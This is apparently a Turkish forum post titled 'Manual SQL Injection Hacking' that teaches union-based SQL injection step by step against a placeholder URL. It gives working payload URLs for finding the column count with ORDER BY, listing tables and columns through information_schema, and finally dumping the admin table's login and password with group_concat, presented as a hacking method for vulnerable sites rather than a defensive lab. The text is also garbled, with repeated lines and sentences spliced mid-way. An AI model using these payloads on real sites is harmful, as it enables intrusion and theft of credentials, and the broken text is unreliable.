Manual SQL İnjection Hacking
*****************************************
Elimzide bir site var bu sitenin sql acıklı olup olmadığını anlamak için yazacağımız komut : İD=1 değerinin sonuna '(üst tek tırnak) ekliyoruz.
eğer karşımıza: You have an error in your SQL syntax; Ve ya Bu tarz bir hata cıkarsa o site sql acıklı bir sitedir.
Örnek site : www.sqlaciklisite.com/hack.php?id=1
Şimdi Biz sql hatasını aldık ilk başda site linki sonuna "+order+by+ " ekleyip calıştıralım. Order+by Komutunda SQL Hatamız Kalkarsa Kolon Sayımız O Kadardır. *****************************************
Elimzide bir site var bu sitenin sql acıklı olup olmadığını anlamak için yazacağımız komut : İD=1 değerinin sonuna '(üst tek tırnak) ekliyoruz.
eğer karşımıza: You have an error in your SQL syntax; Ve ya Bu tarz bir hata cıkarsa o site sql acıklı bir sitedir.
Örnek site : www.sqlaciklisite.com/hack.php?id=1
Sitenin Sonuna "+order+by+1 , +order+by+2 vb" Ekleyelim Yani
www.sqlaciklisite.com/hack.php?id=1+order+by+1 (SQL Hatası Var)
www.sqlaciklisite.com/hack.php?id=1+order+by+2 (SQL Hatası Var)
www.sqlaciklisite.com/hack.php?id=1+order+by+3 (SQL Hatası Var)
www.sqlaciklisite.com/hack.php?id=1+order+by+4 (SQL Hatamız Kalktı)
www.sqlaciklisite.com/hack.php?id=1+order+by+5 (SQL Hatası Var)
Böylece kolon sayımızın 4 olduğunu bulduk(Bu Örnekdir her sitede farklıdır) Şimdiki adım siteye "+union+all+select" Komutu Yazıp calıştıralım. İd Değerinin Sonuna Kolon Sayımız 4 Olduğu İçin
Site Sonunu 4'e Kadar Yazıyoruz."+union+all+select+1,2,3,4" yani;
Site Sonunu 4'e Kadar Yazıyoruz."+union+all+select+1,2,3,4" yani;
www.sqlaciklisite.com/hack.php?id=1+union+all+select+1,2,3,4
Burada Kolon Sayısından Sonra : " -- " yazıyoruz. İD=1'den Öncesine " id=-1 yazıyoruz "
Ekrana bir yazı cıkacak mesela: 3 sayısı ekrana geldi site URL'sinde ;
3 sayısı silip yerine group_concat(table_name) yazıyoruz
Url sonuna da = +from+information_schema.tables+where+table_schema=database()
Ekranda sayıları gördüğümüzde " -- " ve " - " İşaretlerini kaldırıyoruz.
Ekrana tabelalar gelecek bize (admin,adminuser) gibi tablelar Lazım ,örnek olarak admini seçelim
Şimdi sitenin sonuna yazdiğimiz kodu söyle değişelim:
+union+all+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(hacklediğmiz table kod)--Şimdi sitenin sonuna yazdiğimiz kodu söyle değişelim:
Şimdi aldığımız tabloları kırmak icin bir site kullanmacağız istediğiniz site ola bilir
Site: gogole üzerind hex code translator yazarak kolayca bula biliriz en yaygin kullanılan site (String to ASCII chart, ASCII to decimal convertor, String to decimal converter, string hexadecimal / hex conversion)
burada string yerine table ismini yazıyoruz admin kodu: 97 100 109 105 110 bu olacaktır
Site: gogole üzerind hex code translator yazarak kolayca bula biliriz en yaygin kullanılan site (String to ASCII chart, ASCII to decimal convertor, String to decimal converter, string hexadecimal / hex conversion)
burada string yerine table ismini yazıyoruz admin kodu: 97 100 109 105 110 bu olacaktır
kırmak istediğimiz table adını String yerine yazıyosunuz .biz admini seçmiştik o yüzden admini yapacağız.
admin kod: 97 100 109 105 110
ve en sonuda site sonuna yazacağımız kod budur:
www.sqlaciklisite.com/hack.php?id=1+union+all+select+1,group_concat(login,0x3a,pass),3,4+from+admin--admin kod: 97 100 109 105 110
ve en sonuda site sonuna yazacağımız kod budur:
ve Konumuz bu kadar herkese iyi formlar dilerim
Videolu hali: